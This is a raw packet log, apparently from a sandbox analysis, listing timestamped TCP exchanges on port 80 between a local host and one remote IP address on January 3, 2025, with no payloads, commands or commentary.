Jan 3, 2025 20:48:01.982747078 CET	80	49787	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.982767105 CET	49793	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.982795954 CET	49787	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.982952118 CET	49793	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.987720966 CET	80	49793	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:02.341181993 CET	49793	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:02.346060991 CET	80	49793	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:02.346071959 CET	80	49793	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:02.346081018 CET	80	49793	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:02.637207031 CET	80	49793	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:02.684755087 CET	49793	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:02.770019054 CET	80	49793	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:02.825387001 CET	49793	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:02.882678986 CET	49799	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:02.887599945 CET	80	49799	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:02.887706995 CET	49799	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:02.887909889 CET	49799	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:02.892839909 CET	80	49799	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:03.451944113 CET	49799	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:03.456804037 CET	80	49799	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:03.456815958 CET	80	49799	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:03.456826925 CET	80	49799	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:03.531498909 CET	80	49799	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:03.575380087 CET	49799	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:03.692979097 CET	80	49799	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:03.747260094 CET	49799	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:03.833482981 CET	49799	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:03.833683014 CET	49805	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:03.838538885 CET	80	49805	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:03.838563919 CET	80	49799	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:03.838609934 CET	49805	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:03.838629961 CET	49799	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:03.838746071 CET	49805	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:03.843489885 CET	80	49805	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.185029984 CET	49805	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.190035105 CET	80	49805	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.190066099 CET	80	49805	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.190076113 CET	80	49805	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.373287916 CET	49805	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.373313904 CET	49807	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.416205883 CET	80	49807	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.416301012 CET	49807	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.416341066 CET	80	49805	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.416393042 CET	49805	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.416479111 CET	49807	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.421205997 CET	80	49807	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.490596056 CET	49793	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.496357918 CET	49808	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.501185894 CET	80	49808	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.501296997 CET	49808	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.501436949 CET	49808	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.506191015 CET	80	49808	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.763025999 CET	49807	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.767882109 CET	80	49807	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.767934084 CET	80	49807	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.856719971 CET	49808	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:04.861614943 CET	80	49808	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.861624956 CET	80	49808	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:04.861634016 CET	80	49808	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.098258972 CET	80	49807	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.144799948 CET	80	49808	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.153588057 CET	49807	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.200408936 CET	49808	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.317522049 CET	80	49807	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.357927084 CET	80	49808	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.372292995 CET	49807	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.403542042 CET	49808	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.478802919 CET	49807	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.478943110 CET	49808	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.479113102 CET	49815	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.483741999 CET	80	49807	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.483855963 CET	80	49815	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.483911991 CET	49807	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.483951092 CET	49815	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.484010935 CET	80	49808	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.484055042 CET	49808	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.484060049 CET	49815	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.488787889 CET	80	49815	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.841231108 CET	49815	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:05.846123934 CET	80	49815	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.846134901 CET	80	49815	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:05.846149921 CET	80	49815	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:06.203528881 CET	80	49815	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:06.247307062 CET	49815	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:06.347481966 CET	80	49815	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:06.387937069 CET	49815	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:07.297199011 CET	49823	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:07.302144051 CET	80	49823	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:07.302216053 CET	49823	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:07.302350044 CET	49823	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:07.307116985 CET	80	49823	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:07.653898001 CET	49823	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:07.658749104 CET	80	49823	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:07.658760071 CET	80	49823	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:07.658798933 CET	80	49823	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:07.936013937 CET	80	49823	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:07.981653929 CET	49823	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.064183950 CET	80	49823	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:08.106728077 CET	49823	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.190881968 CET	49815	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.192768097 CET	49828	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.192847013 CET	49823	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.197602987 CET	80	49828	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:08.197674990 CET	49828	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.197743893 CET	80	49823	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:08.197770119 CET	49828	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.197789907 CET	49823	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.202557087 CET	80	49828	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:08.544461966 CET	49828	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.549359083 CET	80	49828	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:08.549370050 CET	80	49828	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:08.549376965 CET	80	49828	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:08.854572058 CET	80	49828	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:08.903609037 CET	49828	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:08.989757061 CET	80	49828	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:09.044234037 CET	49828	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:09.291574001 CET	49836	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:09.291616917 CET	49828	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:09.296386003 CET	80	49836	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:09.296724081 CET	80	49828	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:09.296812057 CET	49828	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:09.297214031 CET	49836	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:09.312822104 CET	49836	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:09.317589998 CET	80	49836	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:09.682272911 CET	49836	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:09.687155008 CET	80	49836	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:09.687167883 CET	80	49836	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:09.687186956 CET	80	49836	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:09.987142086 CET	80	49836	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.028580904 CET	49836	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.118899107 CET	80	49836	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.169198036 CET	49836	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.243026018 CET	49836	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.243195057 CET	49843	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.248049021 CET	80	49836	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.248061895 CET	80	49843	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.248114109 CET	49836	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.248132944 CET	49843	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.248255014 CET	49843	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.253025055 CET	80	49843	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.327193975 CET	49844	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.332003117 CET	80	49844	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.332062006 CET	49844	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.332170963 CET	49844	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.336946011 CET	80	49844	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.606941938 CET	49843	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.614569902 CET	80	49843	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.614608049 CET	80	49843	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.614752054 CET	80	49843	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.684881926 CET	49844	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.691519976 CET	80	49844	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.693764925 CET	80	49844	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.903012991 CET	80	49843	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:10.950442076 CET	49843	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:10.990438938 CET	80	49844	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.037098885 CET	80	49843	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.037566900 CET	49844	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.042602062 CET	80	49844	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.042927027 CET	49844	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.091062069 CET	49843	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.150558949 CET	49850	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.150594950 CET	49843	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.155502081 CET	80	49850	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.155692101 CET	80	49843	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.155756950 CET	49843	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.155899048 CET	49850	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.155899048 CET	49850	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.160720110 CET	80	49850	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.513128996 CET	49850	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:11.518224955 CET	80	49850	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.518239975 CET	80	49850	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.518309116 CET	80	49850	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.864078045 CET	80	49850	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:11.919217110 CET	49850	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:12.070692062 CET	80	49850	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:12.122339964 CET	49850	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:12.362813950 CET	49850	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:12.367588997 CET	49857	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:12.372378111 CET	80	49857	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:12.372441053 CET	49857	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:12.379986048 CET	49857	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:12.384741068 CET	80	49857	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:12.758991003 CET	49857	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:12.763941050 CET	80	49857	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:12.763952017 CET	80	49857	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:12.763959885 CET	80	49857	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.014904976 CET	80	49857	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.059840918 CET	49857	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:13.145898104 CET	80	49857	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.200480938 CET	49857	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:13.261074066 CET	49857	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:13.261430979 CET	49863	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:13.266139984 CET	80	49857	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.266205072 CET	49857	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:13.266341925 CET	80	49863	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.266421080 CET	49863	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:13.266545057 CET	49863	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:13.271296978 CET	80	49863	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.622466087 CET	49863	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:13.627665997 CET	80	49863	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.627691984 CET	80	49863	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.627702951 CET	80	49863	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.910242081 CET	80	49863	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:13.950601101 CET	49863	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:14.043957949 CET	80	49863	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:14.091139078 CET	49863	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:14.167383909 CET	49870	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:14.172188997 CET	80	49870	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:14.172261953 CET	49870	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:14.172398090 CET	49870	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:14.178253889 CET	80	49870	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:14.528800011 CET	49870	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:14.533665895 CET	80	49870	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:14.533678055 CET	80	49870	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:14.533689976 CET	80	49870	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:14.838407040 CET	80	49870	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:14.887974024 CET	49870	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:14.967736959 CET	80	49870	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:15.013009071 CET	49870	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.240233898 CET	49863	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.240297079 CET	49881	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.240386009 CET	49870	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.241565943 CET	49882	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.245204926 CET	80	49881	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.245306015 CET	49881	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.245429039 CET	49881	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.246324062 CET	80	49882	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.246377945 CET	49882	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.246442080 CET	49882	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.246680021 CET	80	49870	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.246741056 CET	49870	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.250207901 CET	80	49881	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.251254082 CET	80	49882	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.591432095 CET	49882	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.591579914 CET	49881	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.596219063 CET	80	49882	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.596409082 CET	80	49882	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.596421003 CET	80	49881	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.596539021 CET	80	49881	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.596548080 CET	80	49881	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.886778116 CET	80	49882	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.887640953 CET	49881	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.892667055 CET	80	49881	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:16.892735958 CET	49881	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:16.934942961 CET	49882	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.011888981 CET	49882	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.012394905 CET	49888	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.017014027 CET	80	49882	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.017199993 CET	80	49888	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.017261028 CET	49882	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.017280102 CET	49888	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.017426014 CET	49888	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.022227049 CET	80	49888	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.372464895 CET	49888	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.377319098 CET	80	49888	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.377330065 CET	80	49888	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.377341032 CET	80	49888	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.656760931 CET	80	49888	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.700490952 CET	49888	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.785247087 CET	80	49888	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.825520039 CET	49888	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.898952007 CET	49888	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.899238110 CET	49893	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.903943062 CET	80	49888	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.904076099 CET	80	49893	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:17.904129982 CET	49888	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.904167891 CET	49893	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.904280901 CET	49893	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:17.908998966 CET	80	49893	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:18.316514015 CET	49893	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:18.321377039 CET	80	49893	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:18.321398020 CET	80	49893	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:18.321445942 CET	80	49893	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:18.587204933 CET	80	49893	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:18.626874924 CET	49893	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:18.720141888 CET	80	49893	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:18.763001919 CET	49893	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:18.838223934 CET	49893	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:18.838505983 CET	49900	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:18.843141079 CET	80	49893	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:18.843193054 CET	49893	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:18.843305111 CET	80	49900	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:18.843373060 CET	49900	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:18.843574047 CET	49900	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:18.848376036 CET	80	49900	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:19.202919006 CET	49900	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:19.209157944 CET	80	49900	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:19.209171057 CET	80	49900	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:19.209178925 CET	80	49900	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:19.546940088 CET	80	49900	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:19.591150045 CET	49900	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:19.681186914 CET	80	49900	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:19.731820107 CET	49900	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:19.809453964 CET	49906	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:19.814299107 CET	80	49906	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:19.814410925 CET	49906	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:19.814526081 CET	49906	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:19.819304943 CET	80	49906	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:20.169392109 CET	49906	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:20.174256086 CET	80	49906	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:20.174268007 CET	80	49906	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:20.174274921 CET	80	49906	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:20.447428942 CET	80	49906	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:20.497381926 CET	49906	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:20.576369047 CET	80	49906	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:20.622631073 CET	49906	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:20.716025114 CET	49906	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:20.716028929 CET	49912	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:20.720849037 CET	80	49912	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:20.721111059 CET	80	49906	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:20.721235991 CET	49906	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:20.721244097 CET	49912	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:20.721343040 CET	49912	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:20.726068974 CET	80	49912	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.159338951 CET	49912	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.164225101 CET	80	49912	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.164237022 CET	80	49912	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.164280891 CET	80	49912	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.404231071 CET	80	49912	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.450531960 CET	49912	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.538444042 CET	80	49912	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.583729982 CET	49912	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.664331913 CET	49912	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.669341087 CET	80	49912	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.669400930 CET	49912	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.773613930 CET	49922	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.778455973 CET	80	49922	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.778520107 CET	49922	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.778984070 CET	49922	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.783759117 CET	80	49922	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.890290976 CET	49923	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.895117044 CET	80	49923	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:21.895184994 CET	49923	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.895337105 CET	49923	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:21.900167942 CET	80	49923	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.138236046 CET	49922	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.143129110 CET	80	49922	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.143147945 CET	80	49922	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.143157959 CET	80	49922	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.247587919 CET	49923	80	192.168.2.4	193.58.121.137
